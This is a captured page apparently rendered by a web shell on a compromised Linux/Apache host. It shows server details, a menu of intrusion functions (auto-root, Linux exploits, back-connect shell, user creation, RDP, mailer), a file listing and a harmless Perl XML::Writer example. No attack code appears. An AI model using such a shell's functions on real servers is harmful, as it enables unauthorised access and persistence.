Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml-writer-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
data-mode-sample.pl
535
B
-rwxr-xr-x
directory-as-atom.pl
3.39
KB
-rwxr-xr-x
double-escaping-example.pl
394
B
-rwxr-xr-x
namespace-prefixes.pl
1.36
KB
-rwxr-xr-x
simple-xml.pl
440
B
-rwxr-xr-x
writing-unicode.pl
321
B
-rwxr-xr-x
xml-writer-string.pl
258
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : data-mode-sample.pl
#!/usr/bin/perl -w # Use DATA_MODE and DATA_INDENT to make data documents easier to read use strict; use XML::Writer; use IO::File; my $writer = XML::Writer->new(DATA_MODE => 1, DATA_INDENT => 2); $writer->startTag("doc"); $writer->startTag("x"); $writer->dataElement("y", "Hello, world!"); $writer->dataElement("y", "Hello, world!"); $writer->endTag("x"); $writer->startTag("x"); $writer->dataElement("y", "Hello, world!"); $writer->dataElement("y", "Hello, world!"); $writer->endTag("x"); $writer->endTag("doc"); $writer->end();
Close